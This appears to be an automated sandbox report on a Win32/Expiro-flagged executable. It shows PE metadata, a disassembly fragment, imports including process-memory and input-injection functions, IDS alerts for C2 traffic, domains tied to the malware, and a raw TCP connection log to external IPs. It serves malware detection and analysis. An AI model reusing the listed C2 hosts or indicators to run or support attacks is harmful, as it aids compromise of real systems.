                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x674064AB [Fri Nov 22 11:02:03 2024 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007F12E068C70Fh
                                                                                                                                                                                                    jmp 00007F12E067F724h
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    push edi
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                                                    mov eax, ecx
                                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                                    add eax, esi
                                                                                                                                                                                                    cmp edi, esi
                                                                                                                                                                                                    jbe 00007F12E067F8AAh
                                                                                                                                                                                                    cmp edi, eax
                                                                                                                                                                                                    jc 00007F12E067FC0Eh
                                                                                                                                                                                                    bt dword ptr [004C0158h], 01h
                                                                                                                                                                                                    jnc 00007F12E067F8A9h
                                                                                                                                                                                                    rep movsb
                                                                                                                                                                                                    jmp 00007F12E067FBBCh
                                                                                                                                                                                                    cmp ecx, 00000080h
                                                                                                                                                                                                    jc 00007F12E067FA74h
                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                    xor eax, esi
                                                                                                                                                                                                    test eax, 0000000Fh
                                                                                                                                                                                                    jne 00007F12E067F8B0h
                                                                                                                                                                                                    bt dword ptr [004BA370h], 01h
                                                                                                                                                                                                    jc 00007F12E067FD80h
                                                                                                                                                                                                    bt dword ptr [004C0158h], 00000000h
                                                                                                                                                                                                    jnc 00007F12E067FA4Dh
                                                                                                                                                                                                    test edi, 00000003h
                                                                                                                                                                                                    jne 00007F12E067FA5Eh
                                                                                                                                                                                                    test esi, 00000003h
                                                                                                                                                                                                    jne 00007F12E067FA3Dh
                                                                                                                                                                                                    bt edi, 02h
                                                                                                                                                                                                    jnc 00007F12E067F8AFh
                                                                                                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                                                                                                    sub ecx, 04h
                                                                                                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                                                                                                    mov dword ptr [edi], eax
                                                                                                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                                                                                                    bt edi, 03h
                                                                                                                                                                                                    jnc 00007F12E067F8B3h
                                                                                                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                                                                                                    sub ecx, 08h
                                                                                                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                                                                                                    test esi, 00000007h
                                                                                                                                                                                                    je 00007F12E067F905h
                                                                                                                                                                                                    bt esi, 03h
                                                                                                                                                                                                    jnc 00007F12E067F958h
                                                                                                                                                                                                    movdqa xmm1, dqword ptr [esi+00h]
                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                                                                    • [RES] VS2012 UPD4 build 61030
                                                                                                                                                                                                    • [LNK] VS2012 UPD4 build 61030
                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x6d748.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x8b54f0x8b600308455cadbd77579290bc04149bdd52fFalse0.5699516535874439data6.680433311078666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .rsrc0xc40000x6d7480x6d800d3d7422cdf7b9863b9fa7c340891d73eFalse0.9418499393550228data7.9247916892982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x1320000x990000x98000fae575eb90698f435513a57dab252297False0.9550154836554277data7.8713996381848785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                    RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                    RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                                                                    RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                                                                    RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                                                    RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                                                                    RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                                                                    RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                                                                    RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                                                                    RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                                                                    RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                                                    RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                                                    RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                                                    RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                    RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                    RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                                                    RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                                                    RT_RCDATA0xcc4100x64e1ddata1.000329128076803
                                                                                                                                                                                                    RT_GROUP_ICON0x1312300x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                                                    RT_GROUP_ICON0x1312a80x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                    RT_VERSION0x1312bc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                                                    RT_MANIFEST0x1313980x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                                                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                                                                                                    KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                                                                                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                                                                                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishGreat Britain
                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                    2024-11-22T18:55:03.504209+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970554.244.188.17780TCP
                                                                                                                                                                                                    2024-11-22T18:55:03.629635+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549705TCP
                                                                                                                                                                                                    2024-11-22T18:55:03.629635+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549705TCP
                                                                                                                                                                                                    2024-11-22T18:55:11.295030+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549710132.226.8.16980TCP
                                                                                                                                                                                                    2024-11-22T18:55:11.476965+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5508061.1.1.153UDP
                                                                                                                                                                                                    2024-11-22T18:55:11.552423+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                    2024-11-22T18:55:11.552423+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                    2024-11-22T18:55:15.181990+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5548331.1.1.153UDP
                                                                                                                                                                                                    2024-11-22T18:55:18.217849+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549717TCP
                                                                                                                                                                                                    2024-11-22T18:55:18.217849+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549717TCP
                                                                                                                                                                                                    2024-11-22T18:56:28.107099+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54983382.112.184.19780TCP
                                                                                                                                                                                                    2024-11-22T18:56:53.180105+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.549935TCP
                                                                                                                                                                                                    2024-11-22T18:56:53.180105+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.549935TCP
                                                                                                                                                                                                    2024-11-22T18:56:56.026204+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.549942TCP
                                                                                                                                                                                                    2024-11-22T18:56:56.026204+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.549942TCP
                                                                                                                                                                                                    2024-11-22T18:57:06.464922+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.549971TCP
                                                                                                                                                                                                    2024-11-22T18:57:06.464922+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.549971TCP
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.401633024 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.521183968 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.521270990 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.965106010 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.007802963 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.128242016 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.128319025 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.157747030 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.157766104 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.277376890 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.277400970 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.730917931 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.850552082 CET804970654.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.850857019 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.851218939 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.851218939 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.970741034 CET804970654.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.970774889 CET804970654.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.499643087 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.499800920 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.504209042 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.510045052 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.629635096 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.300820112 CET804970654.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.300903082 CET804970654.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.300962925 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.495866060 CET4970680192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.545485973 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665116072 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665237904 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665410042 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.665452003 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.784825087 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.784884930 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.363271952 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.482897043 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.483000040 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.483361959 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.483361959 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.602832079 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.602857113 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.810857058 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.810870886 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.810940027 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.819839954 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.889367104 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.889518023 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.889595985 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.940294027 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.576822996 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.748923063 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.874174118 CET804970954.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.874718904 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.874989986 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.875005960 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.995066881 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.000987053 CET804970954.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.001027107 CET804970954.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.117593050 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.117676020 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.117968082 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:55:08.237411976 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.302017927 CET804970954.244.188.177192.168.2.5
